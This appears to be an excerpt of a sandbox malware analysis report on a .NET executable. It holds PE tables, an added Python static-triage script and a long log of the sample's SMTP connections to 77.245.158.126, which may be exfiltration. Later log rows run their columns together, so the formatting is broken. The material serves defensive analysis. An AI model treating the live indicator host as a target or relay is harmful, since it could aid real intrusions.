                                                                                                                                                      jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7cc8c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7e000 | 0x98d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x88000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x7cbf0 | 0x38 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x7ace4       0x7ae00   6403e7681c4382fd760e67f120021b85  False     0.6112168584689726  data       6.87952860455371     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x7e000          0x98d8        0x9a00    505e1cfe1d7e64c9606199aa8ae2319d  False     0.9738484172077922  data       7.938275905610368    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x88000          0xc           0x200     ceabe85b151fe5a9bee0f5306c78aaa1  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                         Language  Country  ZLIB Complexity
RT_ICON        0x7e0c8  0x94c4  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                     0.9944858733326332
RT_GROUP_ICON  0x8759c  0x14    data                                                                            1.1
RT_VERSION     0x875c0  0x314   data                                                                            0.4352791878172589
DLL          Import
mscoree.dll  _CorExeMain
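The tables above give everything needed for a first static triage without opening the sample, and they also show the classic false positive in that triage: .rsrc has an entropy of 7.94 bits per byte, but 0x94c4 of its 0x98d8 bytes are a single 256 x 256 PNG icon, which is compressed data and therefore close to maximal entropy on its own. The non-empty IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (the CLR header) together with an import table consisting of nothing but mscoree.dll!_CorExeMain is what marks the file as a managed .NET executable. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it transcribes the report's section, resource, data-directory and import values into plain structures and runs those checks offline, with no pefile or binary needed. FILE_ALIGNMENT (0x200), the entropy threshold, the "explained" fraction and the list of compressed resource types are this example's own assumptions, not values the report states.

```python
"""Static triage of the PE section, data-directory and resource tables above.
Added example, not part of the Joe Sandbox report or the sample: values are transcribed
from the report so the checks run offline without pefile or the binary; FILE_ALIGNMENT,
the thresholds and COMPRESSED_TYPES are this example's assumptions."""
import math
from collections import Counter
from dataclasses import dataclass

FILE_ALIGNMENT = 0x200      # assumed; the report does not print the optional-header value
HIGH_ENTROPY = 7.0          # assumed threshold in bits per byte (maximum is 8.0)
EXPLAINED_FRACTION = 0.9    # assumed: share of a section that known-compressed data must cover
COMPRESSED_TYPES = ("PNG image data", "JPEG image data")  # libmagic types that imply compression

@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    entropy: float
    characteristics: frozenset

@dataclass(frozen=True)
class Resource:
    name: str
    rva: int
    size: int
    file_type: str

# Transcribed from the report's section table.
SECTIONS = [
    Section(".text", 0x2000, 0x7ace4, 0x7ae00, 6.87952860455371,
            frozenset({"IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_READ"})),
    Section(".rsrc", 0x7e000, 0x98d8, 0x9a00, 7.938275905610368,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"})),
    Section(".reloc", 0x88000, 0xc, 0x200, 0.10191042566270775,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_DISCARDABLE",
                       "IMAGE_SCN_MEM_READ"})),
]
# Transcribed from the report's resource table (RVA, size, libmagic type).
RESOURCES = [
    Resource("RT_ICON", 0x7e0c8, 0x94c4, "PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced"),
    Resource("RT_GROUP_ICON", 0x8759c, 0x14, "data"),
    Resource("RT_VERSION", 0x875c0, 0x314, "data"),
]
# Non-empty data directories as (RVA, size), and the import table, from the report.
DATA_DIRECTORIES = {
    "IMAGE_DIRECTORY_ENTRY_IAT": (0x2000, 0x8),
    "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR": (0x2008, 0x48),
    "IMAGE_DIRECTORY_ENTRY_DEBUG": (0x7cbf0, 0x38),
    "IMAGE_DIRECTORY_ENTRY_BASERELOC": (0x88000, 0xc),
}
IMPORTS = {"mscoree.dll": ["_CorExeMain"]}

def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, the measure behind the report's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def round_up(value: int, alignment: int) -> int:
    return (value + alignment - 1) // alignment * alignment

def compressed_resource_fraction(section: Section, resources) -> float:
    """Share of the section's bytes held by resources that are compressed by format."""
    start, end = section.virtual_address, section.virtual_address + section.virtual_size
    inside = [r for r in resources if start <= r.rva < end]
    compressed = sum(r.size for r in inside if r.file_type.startswith(COMPRESSED_TYPES))
    return compressed / section.virtual_size if section.virtual_size else 0.0

def triage_sections(sections, resources):
    """Return (section name, check) pairs; an empty list means nothing looked odd."""
    findings = []
    for s in sections:
        # RawSize should be VirtualSize rounded up to FileAlignment.
        if s.raw_size != round_up(s.virtual_size, FILE_ALIGNMENT):
            findings.append((s.name, "raw_size_mismatch"))
        if {"IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_WRITE"} <= s.characteristics:
            findings.append((s.name, "writable_executable"))
        # High entropy in a non-code section is the usual "encrypted payload in
        # resources" signal, but a PNG icon already sits near 8 bits/byte, so first
        # check how much of the section known-compressed resources account for.
        if s.entropy >= HIGH_ENTROPY and "IMAGE_SCN_CNT_CODE" not in s.characteristics:
            frac = compressed_resource_fraction(s, resources)
            check = ("high_entropy_explained_by_compressed_resources"
                     if frac >= EXPLAINED_FRACTION else "high_entropy_unexplained")
            findings.append((s.name, check))
    return findings

def is_dotnet(data_directories, imports) -> bool:
    """A managed PE has a non-empty CLR header and imports only mscoree!_CorExeMain."""
    _, clr_size = data_directories.get("IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", (0, 0))
    return clr_size != 0 and imports.get("mscoree.dll") == ["_CorExeMain"]

if __name__ == "__main__":
    print("managed (.NET) image:", is_dotnet(DATA_DIRECTORIES, IMPORTS))
    for name, check in triage_sections(SECTIONS, RESOURCES):
        print(f"{name}: {check}")
```

On this sample the only finding is that .rsrc is high-entropy but about 97% covered by the PNG icon, so the entropy figure by itself says nothing about a hidden payload; the managed-code indicators are the stronger static signal, and the next step would be to inspect the CLR metadata rather than the resource directory.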
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Jan 8, 2025 17:56:49.862145901 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:49.866961002 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:49.867024899 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:50.490931034 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:50.491781950 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:50.496618986 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:50.712296963 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:50.713506937 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:50.718305111 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:50.934197903 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:50.936692953 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:50.941469908 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:51.170416117 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:51.173548937 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:51.178308010 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:51.393857956 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:51.394082069 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:51.398891926 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:51.687064886 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:51.702529907 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:51.707458019 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:51.928791046 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:51.985785007 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.045288086 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.045433998 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.045475960 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.045559883 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.050084114 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.050206900 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.050215960 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.050416946 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.092758894 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.097656965 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.097666979 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.097676992 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.097732067 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.097763062 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.097776890 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.097817898 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.097826004 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.097858906 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.097867966 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.097872972 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.097884893 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.097907066 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.097942114 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.097985983 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.097999096 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.098031044 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.098047972 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.102612019 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.102622986 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.102674961 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.102699995 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.102730036 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.102756023 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.102756977 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.102777004 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.102813959 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.102881908 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.102891922 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.102945089 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.103069067 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.103117943 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.103168011 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.103219986 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.107475042 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.107552052 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.107891083 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.107994080 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.108002901 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.108004093 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.108016968 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.108022928 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.108046055 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.108052015 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.108057022 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.108064890 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.108089924 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.108099937 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.108129978 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.108139038 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.108176947 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.108186007 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.112387896 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.112397909 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.112436056 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.112446070 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.112842083 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.112941027 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.112952948 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.112997055 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113006115 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113049030 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113065004 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113281965 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113291025 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113339901 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113347054 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113387108 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113394976 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113405943 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113415956 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113456964 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113467932 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113558054 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113567114 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113639116 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113648891 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113672018 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113681078 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113786936 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113795996 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113804102 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113814116 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113830090 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.113837957 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.114152908 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.114161968 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.114177942 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.114186049 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.114196062 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.115042925 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.115139008 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:56:52.120189905 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.713699102 CET  587          49733      77.245.158.126   192.168.2.4
Jan 8, 2025 17:56:52.765572071 CET  49733        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:57:01.358007908 CET  49736        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:57:01.362958908 CET  587          49736      77.245.158.126   192.168.2.4
Jan 8, 2025 17:57:01.363125086 CET  49736        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:57:01.993386030 CET  587          49736      77.245.158.126   192.168.2.4
Jan 8, 2025 17:57:01.993741035 CET  49736        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:57:01.998521090 CET  587          49736      77.245.158.126   192.168.2.4
Jan 8, 2025 17:57:02.211127043 CET  587          49736      77.245.158.126   192.168.2.4
Jan 8, 2025 17:57:02.211616039 CET  49736        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:57:02.216376066 CET  587          49736      77.245.158.126   192.168.2.4
Jan 8, 2025 17:57:02.429742098 CET  587          49736      77.245.158.126   192.168.2.4
Jan 8, 2025 17:57:02.430011988 CET  49736        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:57:02.435098886 CET  587          49736      77.245.158.126   192.168.2.4
Jan 8, 2025 17:57:02.647659063 CET  587          49736      77.245.158.126   192.168.2.4
Jan 8, 2025 17:57:02.686372995 CET  49736        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:57:02.691272020 CET  587          49736      77.245.158.126   192.168.2.4
Jan 8, 2025 17:57:02.952480078 CET  587          49736      77.245.158.126   192.168.2.4
Jan 8, 2025 17:57:02.953524113 CET  49736        587        192.168.2.4      77.245.158.126
Jan 8, 2025 17:57:02.958394051 CET  587          49736      77.245.158.126   192.168.2.4
Jan 8, 2025 17:57:03.172651052 CET  587          49736      77.245.158.126   192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.172799110 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.177632093 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.393277884 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.393855095 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.393927097 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.393963099 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.394032001 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.396182060 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.398816109 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.398891926 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.398900986 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.398909092 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.398947954 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.401093006 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.401102066 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.401148081 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.401205063 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.401235104 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.401245117 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.401252031 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.401281118 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.401300907 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.401381969 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.401390076 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.401448965 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.405925035 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.405935049 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.405941963 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.405978918 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.406014919 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.406029940 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.406092882 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.406095982 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.406147957 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.406174898 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.406228065 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.410697937 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.410707951 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.410716057 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.410723925 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.410733938 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.410758972 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.410790920 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.410797119 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.410809994 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.410861969 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.410907984 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.410986900 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.415558100 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.415568113 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.415576935 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.415585995 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.415635109 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.415839911 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.415848970 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.415906906 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.415921926 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.415971994 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.420568943 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420655012 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:03.420670033 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420680046 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420684099 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420687914 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420696020 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420703888 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420706987 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420713902 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420722008 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420933962 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420943022 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420949936 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420958996 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420967102 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.420970917 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425332069 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425340891 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425348997 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425357103 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425367117 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425374985 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425379038 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425386906 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425395012 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425398111 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425406933 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425410032 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425412893 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425421000 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425429106 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425513983 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:03.425537109 CET5874973677.245.158.126192.168.2.4
